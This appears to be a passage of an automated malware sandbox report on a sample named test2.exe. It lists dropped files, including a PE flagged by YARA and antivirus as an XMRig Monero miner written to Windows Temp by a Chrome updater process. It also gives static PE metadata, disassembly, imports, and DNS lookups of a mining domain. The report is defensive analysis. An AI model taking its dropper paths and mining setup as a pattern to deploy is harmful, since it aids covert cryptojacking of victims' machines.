                            Preview:ElfChnk..................,.......,..........(.......4..........................................................................................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...................................................................&...........................................................................**.......,......e..............}.T&........}.TA.P[J.......;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                            C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):57888
                            Entropy (8bit):3.8666411606141953
                            Encrypted:false
                            SSDEEP:1536:RZuWlbzAJijE43kE9jsvayM52KcVc7W7LHTM:J
                            MD5:A567C700450BB3D84AAB5FF2C28F89F3
                            SHA1:E29083302264FEBA5CEB4EB6DFDB40BBB0296845
                            SHA-256:6EF9419710A133B29CA35505DE1CF491E73A600B1BD61466C73C9438DC6C1CE2
                            SHA-512:7D04714B5B46F835AD5445602AE52EF008F6EF9F01E508526EBF3908ECAA3254CD98A4012C21638BF547ED20C84015D360E220561F25B1748CBD71FE84C0D15C
                            Malicious:false
                            Preview:ElfChnk.................y...................Xj...s...w0}......................................................................6.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...................................................................................................................&...**......y.......'Rw............>..&........>...+.P.V../<........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                            C:\Windows\Temp\__PSScriptPolicyTest_ch5s5uif.hht.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_gqb0yovg.bas.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_iyathdme.0lp.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_l0qqcezj.4qc.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_mns0larh.lje.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_pv0njcrk.qzm.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_skb1ltqv.gqg.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\__PSScriptPolicyTest_vsu3yh0q.3fi.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\Temp\kkldhmzqxige.tmp

                            Download File
                            Process:C:\Program Files\Google\Chrome\updater.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):5536256
                            Entropy (8bit):6.689058470432344
                            Encrypted:false
                            SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                            MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                            SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                            SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                            SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: Joe Security
                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: ditekSHen
                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: Florian Roth
                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: unknown
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 76%, Browse
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

                            Static File Info

                            General

                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.663338824111387
                            TrID:
                            • Win64 Executable (generic) (12005/4) 74.95%
                            • Generic Win/DOS Executable (2004/3) 12.51%
                            • DOS Executable Generic (2002/1) 12.50%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                            File name:test2.exe
                            File size:5'986'304 bytes
                            MD5:80b97cc01243be6495f5df52bcdd6bdf
                            SHA1:5fe219bfdf8d6825130dcb5414bf05cc56899af5
                            SHA256:3e178f8b58d7c27ad58180fa75f779e2cf3b141ee3839f17bad52d17fb0642db
                            SHA512:32dda4f4432fe22bd91bd5849e7cd3d890a3c79c33b595de38259584a8140e2865bc1789e64e30396b245cf93a26b5a9e669e01d8669101bbfca768727c9f7f6
                            SSDEEP:98304:4NShsPyXqeWGimFHC/Hxvz/IuiLx4bIu2x4c0FdTxJw7N:4lPISXmdC/RvDIuiLx4B2Sc073oN
                            TLSH:0056D0513B3D6529FFD08D34FA0C05D1FEAA5FA54809804DA72A693320FB676563EF28
                            File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....T[..$.............@..............................[.....\][...`... ............................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x1400014b0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x66BA0EAC [Mon Aug 12 13:31:24 2024 UTC]
                            TLS Callbacks:0x40010670, 0x1, 0x40010640, 0x1
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f7505c167603909b7180406402fef19e

                            Entrypoint Preview

                            Instruction
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [005B0F65h]
                            mov dword ptr [eax], 00000001h
                            call 00007F6F1CC33BDFh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [005B0F45h]
                            mov dword ptr [eax], 00000000h
                            call 00007F6F1CC33BBFh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            call 00007F6F1CC4C304h
                            dec eax
                            test eax, eax
                            sete al
                            movzx eax, al
                            neg eax
                            dec eax
                            add esp, 28h
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            dec eax
                            lea ecx, dword ptr [00000009h]
                            jmp 00007F6F1CC33EF9h
                            nop dword ptr [eax+00h]
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            dec eax
                            lea eax, dword ptr [005B5EC9h]
                            dec eax
                            lea edx, dword ptr [eax+21h]
                            mov byte ptr [eax], 00000000h
                            dec eax
                            add eax, 01h
                            dec eax
                            cmp eax, edx
                            jne 00007F6F1CC33F16h
                            ret
                            dec eax
                            lea eax, dword ptr [005B5E71h]
                            dec eax
                            lea edx, dword ptr [eax+18h]
                            mov word ptr [eax], 0000h
                            dec eax
                            add eax, 02h
                            dec eax
                            cmp eax, edx
                            jne 00007F6F1CC33F14h
                            ret
                            dec eax
                            lea eax, dword ptr [005B5E37h]
                            dec eax
                            lea edx, dword ptr [eax+14h]
                            mov word ptr [eax], 0000h
                            dec eax
                            add eax, 02h
                            dec eax

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5b90000xa34.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5bc0000x388.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b30000x120c.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5bd0000x330.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x5b1a200x28.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x5b928c0x250.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x1aac00x1ac00b0b077a3db2220f130909a237824d51eFalse0.4662036360981308data6.153048911846253IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x1c0000x592ce00x592e009b6c02b5fc57e3de11af7fbf29d5834bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0x5af0000x3c900x3e004a9f1198ecc387af8f69f29bfae8181cFalse0.3563508064516129OpenPGP Secret Key5.058508498376052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .pdata0x5b30000x120c0x1400c69bd9ebe130b67c716b6bda7283e221False0.43515625data4.848454879968458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .xdata0x5b50000xf3c0x1000f370cfd23bcc837456ef5efe8db977e3False0.242431640625data4.027695444359416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .bss0x5b60000x23000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0x5b90000xa340xc00464abe84bf8b78db1849d73c667379d2False0.3043619791666667data3.8910320952277866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .CRT0x5ba0000x600x200adb160d33c9222b01107a717786b06d7False0.06640625data0.3054436955437607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .tls0x5bb0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x5bc0000x3880x400dff04db7c2f3138a978d69d74fb533d3False0.4521484375data5.023865484975868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0x5bd0000x3300x400996512c52c772ca6a040a72e00cb2f2aFalse0.576171875data4.806707426175319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x5bc0580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549

                            Imports

                            DLLImport
                            KERNEL32.dllCloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                            msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Aug 12, 2024 15:36:06.888955116 CEST5681553192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:07.093630075 CEST53568159.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:13.010113001 CEST5686053192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:13.211662054 CEST53568609.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:19.086771965 CEST6051153192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:19.409432888 CEST53605119.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:25.163837910 CEST5530753192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:25.343887091 CEST53553079.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:31.240257025 CEST5933153192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:31.452011108 CEST53593319.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:37.317058086 CEST6456453192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:37.498240948 CEST53645649.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:43.409974098 CEST5726853192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:43.574187040 CEST53572689.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:49.486257076 CEST5538353192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:49.651055098 CEST53553839.9.9.9192.168.11.20
                            Aug 12, 2024 15:36:55.578728914 CEST5932253192.168.11.209.9.9.9
                            Aug 12, 2024 15:36:55.943331957 CEST53593229.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:01.655679941 CEST6268953192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:01.925368071 CEST53626899.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:07.748265028 CEST5814053192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:08.155334949 CEST53581409.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:13.825083971 CEST6427953192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:14.748325109 CEST53642799.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:19.917213917 CEST4924853192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:20.081856966 CEST53492489.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:25.994144917 CEST6260953192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:26.158210993 CEST53626099.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:32.070940971 CEST6148553192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:32.238456011 CEST53614859.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:38.148008108 CEST5021053192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:38.359599113 CEST53502109.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:44.224402905 CEST5254653192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:44.402024031 CEST53525469.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:50.300986052 CEST6103853192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:50.467325926 CEST53610389.9.9.9192.168.11.20
                            Aug 12, 2024 15:37:56.377746105 CEST5020953192.168.11.209.9.9.9
                            Aug 12, 2024 15:37:56.966959953 CEST53502099.9.9.9192.168.11.20

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Aug 12, 2024 15:36:06.888955116 CEST192.168.11.209.9.9.90xbac2Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:13.010113001 CEST192.168.11.209.9.9.90xa6b1Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:19.086771965 CEST192.168.11.209.9.9.90x6273Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:25.163837910 CEST192.168.11.209.9.9.90x7cb8Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:31.240257025 CEST192.168.11.209.9.9.90xa123Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:37.317058086 CEST192.168.11.209.9.9.90x29c0Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:43.409974098 CEST192.168.11.209.9.9.90x3fbdStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:49.486257076 CEST192.168.11.209.9.9.90xb1f2Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:55.578728914 CEST192.168.11.209.9.9.90x25cfStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:01.655679941 CEST192.168.11.209.9.9.90x4818Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:07.748265028 CEST192.168.11.209.9.9.90x64b8Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:13.825083971 CEST192.168.11.209.9.9.90x704eStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:19.917213917 CEST192.168.11.209.9.9.90xdc5eStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:25.994144917 CEST192.168.11.209.9.9.90x1e08Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:32.070940971 CEST192.168.11.209.9.9.90x36caStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:38.148008108 CEST192.168.11.209.9.9.90xa6a4Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:44.224402905 CEST192.168.11.209.9.9.90xc139Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:50.300986052 CEST192.168.11.209.9.9.90xed25Standard query (0)xmr.test.lolA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:56.377746105 CEST192.168.11.209.9.9.90x4c5aStandard query (0)xmr.test.lolA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Aug 12, 2024 15:36:07.093630075 CEST9.9.9.9192.168.11.200xbac2Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:13.211662054 CEST9.9.9.9192.168.11.200xa6b1Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:19.409432888 CEST9.9.9.9192.168.11.200x6273Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:25.343887091 CEST9.9.9.9192.168.11.200x7cb8Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:31.452011108 CEST9.9.9.9192.168.11.200xa123Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:37.498240948 CEST9.9.9.9192.168.11.200x29c0Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:43.574187040 CEST9.9.9.9192.168.11.200x3fbdName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:49.651055098 CEST9.9.9.9192.168.11.200xb1f2Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:36:55.943331957 CEST9.9.9.9192.168.11.200x25cfName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:01.925368071 CEST9.9.9.9192.168.11.200x4818Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:08.155334949 CEST9.9.9.9192.168.11.200x64b8Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:14.748325109 CEST9.9.9.9192.168.11.200x704eName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:20.081856966 CEST9.9.9.9192.168.11.200xdc5eName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:26.158210993 CEST9.9.9.9192.168.11.200x1e08Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:32.238456011 CEST9.9.9.9192.168.11.200x36caName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:38.359599113 CEST9.9.9.9192.168.11.200xa6a4Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:44.402024031 CEST9.9.9.9192.168.11.200xc139Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
